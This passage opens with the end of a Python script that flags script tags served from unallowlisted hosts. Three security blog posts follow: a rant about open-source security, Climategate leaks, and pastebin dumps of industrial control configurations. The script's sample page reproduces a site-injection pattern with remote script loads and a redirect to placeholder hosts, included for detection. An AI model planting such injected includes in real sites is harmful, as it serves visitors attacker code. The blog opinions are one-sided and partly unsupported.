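    """Collects the src of every <script> tag and counts inline scripts."""

    def __init__(self):
        super().__init__()
        self.sources = []
        self.inline_scripts = 0

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.sources.append(src.strip())
        else:
            self.inline_scripts += 1


def script_sources(page_html):
    """Return (list of external script srcs, number of inline script blocks)."""
    p = ScriptSourceCollector()
    p.feed(page_html)
    p.close()
    return p.sources, p.inline_scripts


def host_of(src, site_host):
    """Host a script src would load from. Relative paths belong to the site itself;
    anything that is not http(s) (data:, javascript:, ...) is never authorised."""
    parsed = urlparse(src.strip())
    if parsed.scheme not in ("", "http", "https"):
        return None
    if parsed.netloc:
        return (parsed.hostname or "").lower()
    return site_host.lower()


def unauthorized_scripts(page_html, site_host, allowed_hosts=()):
    """Script srcs served from hosts outside the allowlist (the site itself is always allowed).
    Run it against each page on a schedule and alert when the result is non-empty."""
    allowed = {h.lower() for h in allowed_hosts} | {site_host.lower()}
    sources, _ = script_sources(page_html)
    return [s for s in sources if host_of(s, site_host) not in allowed]


def plain_text_only(comment):
    """Cheapest comment/forum filter: escape markup so a pasted <script> renders as text."""
    return html.escape(comment, quote=True)


# Constructed page modelled on the pattern in the ISC diary; hostnames are placeholders.
SAMPLE_PAGE = """<html><body>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="/js/site.js"></script>
<script type="text/javascript" src="https://cdn.example-cdn.net/jquery.min.js"></script>
<script language="JavaScript" type="text/JavaScript" src="http://injected-one.example/js.js"></script>
<script language="JavaScript" type="text/JavaScript" src="http://injected-two.example/js.js"></script>
<script>document.location='http://final-hop.example/main.php?page=0123abcd';</script>
</body></html>
"""

if __name__ == "__main__":
    bad = unauthorized_scripts(SAMPLE_PAGE, "www.example.be", ["cdn.example-cdn.net"])
    for src in bad:
        print("ALERT unauthorised script include:", src)
    print("inline scripts:", script_sources(SAMPLE_PAGE)[1])
```

Keep the allowlist short and per site: every extra CDN you allow is a host whose compromise you have decided not to notice. Inline scripts are only counted here; comparing them against a stored baseline is the next step if your pages contain any.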


why Google's Chris DiBona is wrong and dangerous in so many ways

his post has made the headlines in the itsecurity blogosphere and the open-source fanatics

and it shows that aside from some very intelligent IT security guys working at Google, there are also some very stupid IT security-unaware people who really need to be kept as far away as possible from anything related to IT security because they don't understand the basics of it

I can understand that his culture of freewheeling community-based open source is totally contrary to the strict and controlled environment of secure software (open-source or not), and I agree that such an environment is necessary to learn, test, experiment and try, but these environments are not made for critical things and important data and in many cases shouldn't even be promoted as such on the web

when I start open-source projects I want business support, I want frequent updates and documentation, I want standards and guidelines and I want a way to coordinate and control everything that is happening in them (even if I wouldn't use them for anything too critical)

security is not about open source against closed source; it is about the source and the procedures that you use to keep it safe from the beginning and how you would close and fix security and other issues as fast as possible

both open source and closed source have given in the last years the best and the worst examples of security and mistakes, and the whole discussion about open source being better because it is open source is just as stupid as Linux against Windows and Apple against Windows, even if that discussion is back again in full force after his posting

which is a pity because we shouldn't lose any time with that kind of discussion, because in the end any company or software will finally arrive at the same conclusion: that there are not a thousand different ways of staying secure and informing and helping your user base, and that the techniques and procedures that Microsoft has used and tested over the last years are the best experience around (which is why, for example, Apple hired Microsoft security staff to re-organise the security of its products).

and the same goes for the mobile environment: there is nothing magical and nothing exceptional about mobile code and OSes, and people aren't more security-wise because they are mobile; they can be ripped off and scammed as easily (if one reads the articles about mobile malware in Asia, where many more people have their internet connections through mobile devices). The problem is that the mobile internet finds itself in the same situation as the internet before around 2005. There is no security coordination between the service providers, no security installation on the networks, the app providers don't have the same security standards and there is no CERT (not in Belgium, at least) for mobile networks or mobile malware.

but with your mobile you can now pay for a lot of services, you can transfer money and you get tens of texts at your cost that will cost you a lot to stop them from sending you such texts, so your mobile has become your computer (except if you take a separate mobile only for your online payment and money transfer business).

if Android is for the moment winning the war (even if the popular press is still Apple-hypnotized) because it is more flexible and has less control over its apps and installations and so on, it can lose the war a few months or years from now if it doesn't better secure its environment and its apps, because victims will start to complain, governments will start to look into the matter and press articles will start to have an impact, and at that time someone very high up will ask

who is that stupid guy who said that we didn't need any security and that it would work itself out, and is he capable of repaying the millions or billions I have lost today (a security budget should be at minimum about 7 to 10% of your total project budget)

security is something no one needs to think about: it should be there from the beginning, be adapted over time and still be protective for 99,99% of your clients all the time

all the rest is ideology and that has no place in this industry

you can also wait until the mobile operators start securing their networks or the mobile producers secure them, but they will wait until the politicians react, and they will only react when there are enough victims, and then it is nearly too late

so Chris, I hope you don't have much leverage in Google, and the less you have to do with security the better


climategate 2.0 re-released

in what is a perfect example of how an IT black-ops could try to derail an international political event (like an international congress about very important measures against the warming of the earth, with enormous business interests at stake), hackers released a few years ago emails from the scientists responsible for writing most of the scientific reports that support immediate drastic action, and wanted to prove that they were in fact manipulating world opinion, the press and the political leaders.

maybe it didn't have an immediate dramatic effect, but I am sure that thousands of work hours have been spent by all kinds of people to handle the immediate and long-term effects of the hacking and the after-effects.

so just before another international conference about dramatic international agreements about what to do with the changing climate (as if we don't see this happening with our own eyes), another part of the database of stolen emails from 2009 was released (and hyperblogged about by the conservative and pro-business web campaigns)

the total set of emails is more than 200.000, which are encrypted

the total set of emails that are now leaked is around 5000, and out of that set only a few fragments have been quoted and sent around (referring for the full versions to a zipped file on a Russian server, which doesn't mean that they are Russians, because anyone who wants to hide their identity looks for a country like Russia to host their criminal files; although it shows that the Russian authorities do not totally disagree with the actions, because otherwise they would have shut down the server as they would do with their own democratic opposition and free press).

so this is a clear example of what an info-ops is: an operation with clearly set information goals in the information war about your minds, as they would say

just to remember: the reports about the incidents and the emails in question have cleared the scientific discussions that were held in the emails but had some questions about the appropriateness of some political and PR remarks, and rightly so

it also shows that they have now better secured their email server, because otherwise new files would have been released (or their paymasters didn't want to pay the necessary sum to set up such an operation)


there are more ongoing attacks against critical infrastructure than you think

This made me look for other "pastes" by pr0f. What I found:

More Simatic HTML (not clear where it comes from)

http://pastebin.com/wY6XD97L

A Vacuum gauge configuration file from Caltech

http://pastebin.com/TgRTgrAK

A control system from smu.edu. Looks like power generation to me, but may be an experiment, not production

http://pastebin.com/HLNB6SAZ

Another paste, showing the (pretty good) password for a Spanish water utility, has since been removed.
source: http://isc.sans.edu/diary.html?storyid=12088&rss

this doesn't mean that these systems have been hacked: they have been attacked or scanned and information about them has been published, but that doesn't mean that control over the infrastructure has been gained and maintained by the hackers

it doesn't mean that cyberwar and the militarization of cybersecurity are necessary

it is more necessary that critical infrastructure is NOT linked to the internet; it should have its own closed networks and bases
